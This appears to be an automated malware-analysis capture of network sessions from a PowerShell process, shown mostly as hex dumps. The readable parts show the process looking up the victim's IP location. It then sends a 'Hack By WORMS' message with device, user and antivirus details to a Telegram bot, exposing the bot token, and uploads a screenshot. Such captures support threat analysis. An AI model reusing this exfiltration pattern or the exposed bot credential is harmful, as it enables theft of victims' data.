                                                                                                        Data Ascii: 66,238,163,76,78,99,183,5,237,120,175,28,233,230,159,61,247,170,164,150,221,165,120,160,123,39,181,195,83,147,125,169,219,199,228,4,186,13,152,225,17,154,225,233,196,213,239,26,26,104,134,158,143,255,243,181,238,179,73,142,219,125,55,22,254,117,81,173,254
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 2c 31 30 34 2c 34 2c 32 32 37 2c 31 35 38 2c 32 37 2c 31 32 37 2c 31 37 34 2c 38 34 2c 31 36 36 2c 31 36 30 2c 31 39 31 2c 31 31 38 2c 36 34 2c 32 33 39 2c 39 33 2c 31 33 36 2c 32 33 2c 31 32 38 2c 31 38 32 2c 32 31 31 2c 31 37 34 2c 32 34 34 2c 31 30 37 2c 31 35 36 2c 33 33 2c 31 36 35 2c 36 38 2c 34 36 2c 31 37 32 2c 31 30 37 2c 32 30 30 2c 32 35 33 2c 31 32 30 2c 36 36 2c 31 35 33 2c 31 37 32 2c 32 34 30 2c 31 33 33 2c 32 39 2c 31 32 35 2c 36 37 2c 32 31 37 2c 32 35 30 2c 31 35 35 2c 39 38 2c 37 33 2c 32 35 30 2c 38 39 2c 32 32 32 2c 34 39 2c 31 33 30 2c 39 30 2c 32 34 31 2c 31 37 34 2c 31 33 34 2c 37 36 2c 35 32 2c 36 39 2c 36 39 2c 31 37 33 2c 31 36 34 2c 31 39 31 2c 31 38 35 2c 31 36 31 2c 31 32 33 2c 31 36 2c 33 36 2c 31 33 39 2c 31 38 35 2c 35 30
                                                                                                        Data Ascii: ,104,4,227,158,27,127,174,84,166,160,191,118,64,239,93,136,23,128,182,211,174,244,107,156,33,165,68,46,172,107,200,253,120,66,153,172,240,133,29,125,67,217,250,155,98,73,250,89,222,49,130,90,241,174,134,76,52,69,69,173,164,191,185,161,123,16,36,139,185,50
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 32 34 39 2c 31 30 31 2c 31 38 30 2c 31 34 38 2c 32 31 39 2c 31 35 31 2c 33 34 2c 31 38 38 2c 31 35 32 2c 31 30 36 2c 32 31 36 2c 31 30 2c 31 38 35 2c 31 38 30 2c 32 32 38 2c 31 38 30 2c 32 31 34 2c 31 33 38 2c 31 38 32 2c 31 30 31 2c 31 30 30 2c 32 32 37 2c 32 30 32 2c 33 39 2c 35 38 2c 31 35 30 2c 31 37 2c 37 31 2c 32 30 33 2c 31 39 2c 32 39 2c 38 37 2c 34 39 2c 31 31 31 2c 31 37 33 2c 31 39 36 2c 35 35 2c 32 33 30 2c 32 35 31 2c 31 31 37 2c 37 39 2c 31 31 36 2c 31 31 32 2c 31 30 30 2c 32 35 35 2c 34 32 2c 31 38 30 2c 31 33 32 2c 33 39 2c 38 2c 32 30 37 2c 31 30 37 2c 36 36 2c 31 32 30 2c 35 37 2c 31 39 37 2c 33 35 2c 32 31 32 2c 31 37 31 2c 32 34 37 2c 38 31 2c 31 35 2c 32 31 39 2c 31 36 31 2c 31 35 39 2c 35 32 2c 31 34 37 2c 31 35 2c 31 35 35 2c 32 33
                                                                                                        Data Ascii: 249,101,180,148,219,151,34,188,152,106,216,10,185,180,228,180,214,138,182,101,100,227,202,39,58,150,17,71,203,19,29,87,49,111,173,196,55,230,251,117,79,116,112,100,255,42,180,132,39,8,207,107,66,120,57,197,35,212,171,247,81,15,219,161,159,52,147,15,155,23
                                                                                                        2024-11-25 14:22:25 UTC8000INData Raw: 31 2c 31 36 35 2c 32 34 32 2c 32 34 37 2c 32 31 36 2c 34 37 2c 31 36 2c 31 31 35 2c 37 36 2c 31 36 34 2c 36 32 2c 39 38 2c 31 34 2c 31 37 36 2c 32 33 31 2c 31 34 36 2c 31 31 35 2c 31 36 35 2c 31 32 34 2c 32 34 32 2c 31 34 32 2c 31 30 2c 38 38 2c 31 35 31 2c 33 31 2c 31 34 38 2c 31 36 38 2c 31 39 32 2c 32 35 30 2c 36 2c 31 35 32 2c 31 34 31 2c 31 31 31 2c 31 35 31 2c 34 30 2c 31 34 39 2c 32 34 32 2c 31 31 31 2c 32 33 36 2c 32 34 39 2c 32 32 38 2c 31 34 34 2c 36 38 2c 31 38 39 2c 31 39 34 2c 31 32 35 2c 34 2c 32 31 32 2c 31 37 31 2c 31 38 2c 31 38 31 2c 31 36 33 2c 31 34 38 2c 31 34 35 2c 39 33 2c 36 34 2c 32 35 34 2c 33 34 2c 38 31 2c 31 39 34 2c 39 30 2c 37 38 2c 32 34 36 2c 36 39 2c 33 34 2c 31 34 33 2c 31 33 39 2c 38 34 2c 31 34 39 2c 32 35 30 2c 38 35
                                                                                                        Data Ascii: 1,165,242,247,216,47,16,115,76,164,62,98,14,176,231,146,115,165,124,242,142,10,88,151,31,148,168,192,250,6,152,141,111,151,40,149,242,111,236,249,228,144,68,189,194,125,4,212,171,18,181,163,148,145,93,64,254,34,81,194,90,78,246,69,34,143,139,84,149,250,85
                                                                                                        2024-11-25 14:22:25 UTC8000INData Raw: 2c 32 34 39 2c 31 33 39 2c 32 30 32 2c 34 35 2c 31 38 37 2c 31 36 32 2c 32 33 34 2c 33 2c 31 33 38 2c 31 32 37 2c 36 38 2c 33 33 2c 31 36 33 2c 37 30 2c 32 30 30 2c 31 2c 32 30 2c 35 32 2c 32 32 39 2c 32 33 34 2c 31 34 2c 32 30 30 2c 39 31 2c 31 36 39 2c 37 30 2c 31 35 37 2c 34 35 2c 32 33 34 2c 31 37 33 2c 33 37 2c 35 35 2c 31 37 33 2c 33 2c 31 35 35 2c 31 39 33 2c 37 35 2c 32 33 35 2c 32 31 32 2c 37 31 2c 32 30 30 2c 31 36 31 2c 31 35 34 2c 39 31 2c 32 31 37 2c 32 31 39 2c 32 33 33 2c 32 32 30 2c 32 32 38 2c 31 30 31 2c 31 37 35 2c 33 34 2c 31 38 37 2c 36 35 2c 32 33 30 2c 38 37 2c 32 36 2c 33 31 2c 36 34 2c 36 35 2c 31 39 2c 31 2c 32 33 32 2c 33 33 2c 37 33 2c 31 32 38 2c 32 33 2c 31 34 34 2c 32 35 2c 31 32 38 2c 35 35 2c 31 34 34 2c 31 32 35 2c 30 2c
                                                                                                        Data Ascii: ,249,139,202,45,187,162,234,3,138,127,68,33,163,70,200,1,20,52,229,234,14,200,91,169,70,157,45,234,173,37,55,173,3,155,193,75,235,212,71,200,161,154,91,217,219,233,220,228,101,175,34,187,65,230,87,26,31,64,65,19,1,232,33,73,128,23,144,25,128,55,144,125,0,
                                                                                                        2024-11-25 14:22:25 UTC8000INData Raw: 30 37 2c 31 35 31 2c 39 2c 31 35 34 2c 32 33 37 2c 31 34 32 2c 31 32 39 2c 31 36 39 2c 32 33 33 2c 31 39 30 2c 31 35 32 2c 32 32 32 2c 31 31 31 2c 33 35 2c 31 34 32 2c 32 31 36 2c 38 30 2c 31 30 32 2c 31 36 34 2c 32 31 35 2c 36 32 2c 35 33 2c 31 35 33 2c 35 30 2c 32 34 39 2c 32 33 37 2c 39 39 2c 31 34 2c 32 32 34 2c 36 38 2c 36 2c 32 32 31 2c 31 36 36 2c 31 37 32 2c 36 32 2c 33 30 2c 31 38 32 2c 31 38 37 2c 31 33 32 2c 35 37 2c 33 32 2c 33 39 2c 38 33 2c 38 33 2c 37 30 2c 32 35 31 2c 31 37 36 2c 31 37 39 2c 35 35 2c 34 2c 31 35 33 2c 31 39 39 2c 31 33 31 2c 35 31 2c 38 36 2c 31 32 39 2c 32 34 37 2c 32 31 37 2c 31 36 33 2c 38 31 2c 32 37 2c 39 2c 31 32 38 2c 36 34 2c 33 36 2c 32 32 34 2c 32 34 2c 31 34 31 2c 32 31 39 2c 32 30 30 2c 32 33 32 2c 32 33 32 2c
                                                                                                        Data Ascii: 07,151,9,154,237,142,129,169,233,190,152,222,111,35,142,216,80,102,164,215,62,53,153,50,249,237,99,14,224,68,6,221,166,172,62,30,182,187,132,57,32,39,83,83,70,251,176,179,55,4,153,199,131,51,86,129,247,217,163,81,27,9,128,64,36,224,24,141,219,200,232,232,
                                                                                                        2024-11-25 14:22:25 UTC8000INData Raw: 30 33 2c 32 30 34 2c 32 37 2c 37 33 2c 37 35 2c 32 33 32 2c 34 38 2c 32 33 39 2c 32 2c 33 39 2c 31 2c 32 2c 38 33 2c 31 32 34 2c 33 34 2c 36 2c 31 33 31 2c 32 37 2c 32 35 33 2c 37 2c 39 34 2c 31 38 33 2c 33 36 2c 31 33 34 2c 31 32 30 2c 31 34 38 2c 31 36 34 2c 36 35 2c 33 37 2c 31 30 31 2c 32 30 30 2c 36 38 2c 39 38 2c 31 30 35 2c 31 33 37 2c 36 39 2c 34 33 2c 32 33 34 2c 31 34 31 2c 33 36 2c 31 36 34 2c 31 32 30 2c 31 39 2c 37 33 2c 32 33 2c 32 34 31 2c 36 38 2c 37 35 2c 31 33 36 2c 32 30 2c 31 31 33 2c 33 36 2c 31 30 2c 31 35 35 2c 37 30 2c 32 30 2c 31 31 38 2c 31 36 35 2c 31 37 39 2c 31 33 33 2c 32 31 32 2c 39 38 2c 32 32 2c 32 33 30 2c 31 39 39 2c 33 2c 32 2c 32 34 31 2c 31 30 38 2c 30 2c 34 34 2c 31 36 30 2c 36 38 2c 31 37 30 2c 31 35 32 2c 31 39 32
                                                                                                        Data Ascii: 03,204,27,73,75,232,48,239,2,39,1,2,83,124,34,6,131,27,253,7,94,183,36,134,120,148,164,65,37,101,200,68,98,105,137,69,43,234,141,36,164,120,19,73,23,241,68,75,136,20,113,36,10,155,70,20,118,165,179,133,212,98,22,230,199,3,2,241,108,0,44,160,68,170,152,192


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.84970934.117.59.814432216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-25 14:22:45 UTC158OUTGET /json HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Host: ipinfo.io
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-25 14:22:45 UTC345INHTTP/1.1 200 OK
                                                                                                        access-control-allow-origin: *
                                                                                                        Content-Length: 319
                                                                                                        content-type: application/json; charset=utf-8
                                                                                                        date: Mon, 25 Nov 2024 14:22:45 GMT
                                                                                                        x-content-type-options: nosniff
                                                                                                        via: 1.1 google
                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close
                                                                                                        2024-11-25 14:22:45 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                                                                                                        Data Ascii: { "ip": "8.46.123.75", "hostname": "static-cpe-8-46-123-75.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.849710149.154.167.2204432216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-25 14:22:47 UTC276OUTPOST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Content-Type: application/json
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 268
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-25 14:22:48 UTC268OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 68 61 74 5f 69 64 22 3a 20 20 22 37 31 36 39 34 31 34 31 31 35 22 2c 0d 0a 20 20 20 20 22 74 65 78 74 22 3a 20 20 22 48 61 63 6b 20 42 79 20 57 4f 52 4d 53 3a 5c 6e 2d 20 44 65 76 69 63 65 20 49 44 3a 20 64 61 62 39 62 62 66 34 2d 61 39 62 61 2d 34 31 65 39 2d 61 62 37 61 2d 65 63 64 64 37 34 31 39 33 36 65 37 5c 6e 2d 20 48 57 49 44 3a 20 44 31 32 32 41 41 43 35 46 30 20 32 37 31 46 37 36 32 44 41 46 5c 6e 2d 20 50 75 62 6c 69 63 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 5c 6e 2d 20 43 6f 75 6e 74 72 79 3a 20 55 53 5c 6e 2d 20 55 73 65 72 6e 61 6d 65 3a 20 68 75 62 65 72 74 5c 6e 2d 20 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 48 55 42 45 52 54 2d 50 43 5c 6e 2d 20 41 6e 74 69 76 69 72 75 73 3a 20 57 69 6e 64 6f 77 73
                                                                                                        Data Ascii: { "chat_id": "7169414115", "text": "Hack By WORMS:\n- Device ID: dab9bbf4-a9ba-41e9-ab7a-ecdd741936e7\n- HWID: D122AAC5F0 271F762DAF\n- Public IP: 8.46.123.75\n- Country: US\n- Username: user\n- Computer Name: user-PC\n- Antivirus: Windows
                                                                                                        2024-11-25 14:22:48 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Mon, 25 Nov 2024 14:22:48 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-11-25 14:22:48 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 38 32 35 34 38 38 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 43 53 45 4e 44 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 43 53 45 4e 44 31 31 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 36 39 34 31 34 31 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 61 63 73 6f 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 65 63 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 77 6f 72 6d 5f 6e 6a 72 61 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 34 34 35 36 38 2c 22
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5969,"from":{"id":8168254885,"is_bot":true,"first_name":"PCSENDBot","username":"PCSEND111bot"},"chat":{"id":7169414115,"first_name":"Jacson","last_name":"Rec","username":"xworm_njrat","type":"private"},"date":1732544568,"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.849711149.154.167.2204432216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-25 14:22:50 UTC208OUTPOST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=058ae0d9-f381-4383-b2eb-b7376aff61a3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 695695
                                                                                                        2024-11-25 14:22:50 UTC1024OUTData Raw: 2d 2d 30 35 38 61 65 30 64 39 2d 66 33 38 31 2d 34 33 38 33 2d 62 32 65 62 2d 62 37 33 37 36 61 66 66 36 31 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 36 39 34 31 34 31 31 35 0d 0a 2d 2d 30 35 38 61 65 30 64 39 2d 66 33 38 31 2d 34 33 38 33 2d 62 32 65 62 2d 62 37 33 37 36 61 66 66 36 31 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 68 6f 74 6f 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49
                                                                                                        Data Ascii: --058ae0d9-f381-4383-b2eb-b7376aff61a3Content-Disposition: form-data; name="chat_id"7169414115--058ae0d9-f381-4383-b2eb-b7376aff61a3Content-Disposition: form-data; name="photo"; filename="screenshot.png"Content-Type: image/pngPNGI
                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: 69 fd 6e 69 df 9d af a8 ba 3b 5d 9e db 45 bb a4 fb d9 f5 f2 cc d4 2e 97 55 dd 9d 7f d4 c2 18 96 ee 91 ae 95 da ce 4e 97 e6 bc 25 bb 5f 99 59 bc 5b ba 6e c2 d7 d2 12 63 7e 59 fa ac 4b d3 e7 5f b2 cb e5 b9 d5 58 b1 c5 3b a7 fd 77 4c 7b ee f4 a3 0c 63 60 ae 87 9d 52 7c c7 34 9f 50 7f 6a fb 4b 32 8b 76 b8 34 8d c9 49 7b f6 61 d1 0e 97 65 ca 3c 62 53 db a7 7d b7 4b d7 df f6 d2 6a 6a 9b 4b 72 7f e9 0e e9 7e 13 c4 ba 5b 5f dc ce fb 1c 7d 58 b2 7d da d7 fa a0 bd 58 4b bb 6c fb b4 66 bb 34 b7 6d 5a 9f 5a 8d 17 6f 93 f2 b6 ba b8 5a b4 75 ba 6e ea 13 53 9e 20 ce 3c 30 b7 7c 87 f4 9d a7 98 e7 d3 ef 6c 76 7e d5 dd f2 a2 9c d7 d9 e2 c2 1c 53 ae ae c7 b5 98 d3 f5 b4 c7 92 34 16 cb d2 35 97 a7 18 ed 52 72 d2 1a 5a c6 2b d2 3e b4 e4 2d 4a d7 62 2e af d9 26 7d af 5b a5 7b
                                                                                                        Data Ascii: ini;]E.UN%_Y[nc~YK_X;wL{c`R|4PjK2v4I{ae<bS}KjjKr~[_}X}XKlf4mZZoZunS <0|lv~S45RrZ+>-Jb.&}[{
                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: 45 82 0f 90 7b 54 07 52 e5 e7 31 c5 97 be e9 d6 9a d4 d7 8b 3f 74 0c 58 15 81 3e e6 6d c0 aa 06 94 c0 a3 75 61 07 92 79 e5 98 3c 17 7c 08 45 aa ff e8 fb 5e b4 c4 99 cf b9 fb 5c 97 8f fa 2e db ff a6 cc d2 fd 6e cc 22 10 31 58 0a c0 52 f4 81 2a 00 41 c7 7e 7d 4e c2 4e 02 90 16 10 7e ff fa 8d 3f 6e 8f f8 2a 0f 89 a7 b1 d0 1a fa aa 1e 24 0f 36 d8 ff e6 bc 97 f6 a6 45 fc 49 1c ba f4 f3 b7 01 ab 12 b0 83 c8 da fd da 56 fa 21 ed 90 77 12 79 aa f4 03 89 bf 52 fa 81 f2 05 b1 7a af f4 f9 76 bd 2a 8b 3e 49 40 c9 bf e5 7b 52 65 58 0b 3f 49 3f cd d3 47 08 22 f7 90 7a 1c fd 95 dc a3 d5 31 60 09 42 2a 04 25 01 41 b2 90 97 88 2c 4b d7 92 00 a4 0a 90 6a c0 3c de ee 92 2c f3 24 f0 24 fb 90 7b 50 0a 40 e5 2c df 35 dd 7b 42 71 e1 12 90 31 7b 20 fd 16 35 cf ff cb 55 80 db a4
                                                                                                        Data Ascii: E{TR1?tX>muay<|E^\.n"1XR*A~}NN~?n*$6EIV!wyRzv*>I@{ReX?I?G"z1`B*%A,Kj<,$${P@,5{Bq1{ 5U
                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: ef 5f 5d 5d 72 e9 8f aa 6b ae bb 21 14 7c c3 18 24 00 1d 97 81 ff d7 19 e9 1f 58 f6 d6 df 7e 6f fe 75 5c e8 0d 42 42 2c 8a 0d c2 f3 23 2a e4 5f 59 fd 77 ff 51 89 23 53 ff 98 89 55 00 3e b9 e6 d3 d5 d4 17 d2 3f 6a 4c fe 4d 42 00 46 c7 7e 9d 48 e6 cd 86 05 01 38 9e 00 fc fc 17 c6 11 80 b5 f4 9b 8b f8 13 08 c0 8f cf 52 00 ce b7 04 fc 7d 13 80 1d 04 5c 11 1b 97 48 fe 39 a1 f4 73 02 e9 e7 b8 e4 1b c4 0c 31 d7 27 3e 69 d6 b6 00 5c db 12 30 92 7f b0 3e 0a 40 88 24 df 20 22 e9 e7 94 42 af 64 6d 0a 40 88 24 df 20 d6 b5 00 2c 63 25 0b 02 70 8e 04 f2 0f 22 d9 17 b1 3e 09 c0 52 f2 95 44 79 12 7f 7a 5b 70 2b fe 1a 24 fa 90 7e 4b d2 3c 48 00 7a e5 5e 04 02 d0 c5 5e 44 2b 17 9b 35 39 f6 c6 fa 39 80 de 96 47 7f b3 fc 43 e0 bd 7e 5a f8 b9 08 94 f4 93 e8 53 75 20 63 49 41
                                                                                                        Data Ascii: _]]rk!|$X~ou\BB,#*_YwQ#SU>?jLMBF~H8R}\H9s1'>i\0>@$ "Bdm@$ ,c%p">RDyz[p+$~K<Hz^^D+599GC~ZSu cIA
                                                                                                        2024-11-25 14:22:50 UTC15447OUTData Raw: bf 64 df 74 7f d6 17 be 66 90 00 8c 70 01 88 14 54 65 9f 84 5f 59 e9 a7 0a 3e a4 1e b2 4f c2 4f d2 0f 90 81 8c 91 7f 50 8b c2 ba ca 8f aa 3f 04 1f 2d 52 4f 02 50 62 51 92 af b3 f3 e5 39 26 f1 c7 7a e5 38 ca 69 73 1b 51 07 88 39 97 79 2e fe 34 ef 63 90 e0 73 c9 a7 16 d9 47 df e7 3c 1f 5a 59 98 50 25 a1 57 03 22 01 73 6b 95 7f a0 aa 3f 90 0c 54 9c 56 31 c6 9e 0b 8c 99 43 04 22 fd 96 ee 9c ee 35 81 04 5c b4 43 ba 0f 8e cb ee 70 65 b5 7c a7 14 6f 64 9e 24 a0 44 1e 31 1d ff 55 45 1f 7d e5 6a 2c f9 27 f4 ac 40 ed b1 6c c7 f4 f9 b6 a7 1a 30 7d 76 93 80 b4 dd ad d3 da 46 ca 81 64 9d 04 20 48 d8 01 f3 12 77 f4 25 f2 b4 5e 39 82 39 8f f9 75 b4 8f 8b bf 08 e4 1d 72 cf f3 3c 56 8a 39 87 3c ad eb 91 77 29 a6 38 ad 04 5f 39 e7 f8 fe 39 87 7e 8a 49 b8 21 01 15 93 a0 93
                                                                                                        Data Ascii: dtfpTe_Y>OOP?-ROPbQ9&z8isQ9y.4csG<ZYP%W"sk?TV1C"5\Cpe|od$D1UE}j,'@l0}vFd Hw%^99ur<V9<w)8_99~I!
                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: 80 10 e5 1f 6c 57 00 82 c7 7e e9 5b 0d 48 1f 01 68 1c 32 01 a8 cc 6b ab fb 38 0e 0c 8e c9 33 16 d7 b4 02 d0 f7 fe 39 46 00 66 12 d0 0a c1 28 eb 94 7a ca 3a 8e 05 5b e5 c7 3b 02 19 33 b7 e5 f8 ee 40 dc 4b 62 d5 5f dc bf ed 7b fc 97 0b 42 bc 24 04 f1 e7 e5 21 0a 3b a5 5d 14 7b 4a 3d 63 51 e2 d9 2a 00 81 58 2b 00 21 ae 1b 41 e0 0d 12 50 10 7d 93 a7 7c ae 9b 3c f9 9a 51 0c 4a 14 80 a2 fc 8b 47 82 89 23 07 11 7c 1e 03 b6 f2 0f 94 82 ca 40 05 a0 e2 0f 18 fb ce 3f 8f f9 c6 ea 3e 84 20 7d e3 c4 80 be 62 10 49 a7 c8 8b 02 30 c6 da e3 be 31 87 36 8b 23 00 21 ca 3a 51 f4 81 f3 b1 6f 45 a0 c2 af 1d 0b 63 24 9d 62 af 0a 3b e4 1b 79 ac 39 f5 aa 71 0e 8c 9b c7 bc 7d e5 1f 7d df 1b 48 1b 85 1f 32 50 21 c8 71 60 2e fe 88 c7 7d d7 4e 6b c0 74 05 00 00 ff f4 49 44 41 54 f8
                                                                                                        Data Ascii: lW~[Hh2k839Ff(z:[;3@Kb_{B$!;]{J=cQ*X+!AP}|<QJG#|@?> }bI016#!:QoEc$b;y9q}}H2P!q`.}NktIDAT
                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: 7b c2 35 53 d2 d0 b9 ba 7e a8 f4 8b 55 80 82 08 a4 d2 cf 1b 7e 69 11 80 b4 88 be 78 f4 b7 97 7e b1 df cb 3c da 56 00 72 d3 6f bd 00 e4 f1 fd bc 31 a4 9f 15 80 c4 10 80 93 13 3e 55 05 9e 92 cf f7 ff 21 f1 aa 78 1b e4 60 26 f7 a0 7d 87 20 fd 7a 64 b7 c4 01 69 e7 51 5d a4 9f 32 90 63 c1 51 e4 11 03 44 9f b2 8f 7c 9f a7 20 8c d2 10 41 68 ac 15 6f 8a b9 d8 57 d2 b5 b2 6e 0d 79 36 54 0b 82 02 d0 63 c1 51 fa d1 b6 82 d0 67 b8 a7 f1 ba 86 bc d2 47 c8 b5 47 81 65 19 01 c8 3a d6 7b 1c d8 63 be cc 11 e3 08 30 7d e2 e6 d7 35 27 96 9f e7 a3 fa 6a 3a 25 9c 12 8d b9 28 d4 c4 3c fa 5e ce e1 98 7c c7 51 e6 d1 17 63 e4 ba 7f 9c 17 f6 40 f2 39 ef d1 63 a4 1f 28 07 81 1c 3e cb e4 37 3e 36 8a 47 b0 92 2f d2 0a c0 4c 12 9a cb 45 20 51 00 c6 7c d8 9e 00 e4 c2 8f 8b 6e ee 1e fa
                                                                                                        Data Ascii: {5S~U~ix~<Vro1>U!x`&} zdiQ]2cQD| AhoWny6TcQgGGe:{c0}5'j:%(<^|Qc@9c(>7>6G/LE Q|n
                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: 46 6d 9d b3 5a 70 55 01 48 1b 85 1f 44 91 e7 45 1d a2 f0 8b 47 86 15 80 ed 3e 75 3c 08 40 25 a0 c2 af ca be 39 02 50 09 38 4b ee 09 55 82 b3 e6 59 8f c4 8b 12 30 8a 3e fa 54 ff d5 63 be 08 b8 32 46 08 32 a7 00 44 f0 c5 ca 3f 8f fa 56 b9 57 e2 13 c4 d9 10 27 77 8d e3 be 43 0e f3 c8 bf 28 00 95 80 8a 3f aa 00 6b 3b 88 3f 51 06 2a ee a2 bc 53 00 42 26 f8 88 49 cc 69 e7 6a ac 11 7e b4 1e 0b e6 38 b0 95 7e b4 f6 21 8a 41 e4 df e4 29 9f 1f c7 4a c0 9a 77 7a 89 0d 62 2f 1e 21 26 66 25 a0 fd 88 b7 0c 23 e2 90 79 0a 39 fa 8e 91 7f b4 48 3c fa 54 03 32 76 0e b1 67 df dc 38 36 a6 0c a4 25 c6 fe b4 8c 39 0e 8c ec 8b 95 7d 51 f8 2d 12 80 48 3a e4 9d c7 84 11 7a 0a 40 44 9e 62 90 1c a5 9e 71 d6 28 07 95 80 0a c1 56 00 7a 6c d8 be 12 10 21 87 88 03 2b f7 90 73 80 b8 23
                                                                                                        Data Ascii: FmZpUHDEG>u<@%9P8KUY0>Tc2F2D?VW'wC(?k;?Q*SB&Iij~8~!A)Jwzb/!&f%#y9H<T2vg86%9}Q-H:z@Dbq(Vzl!+s#
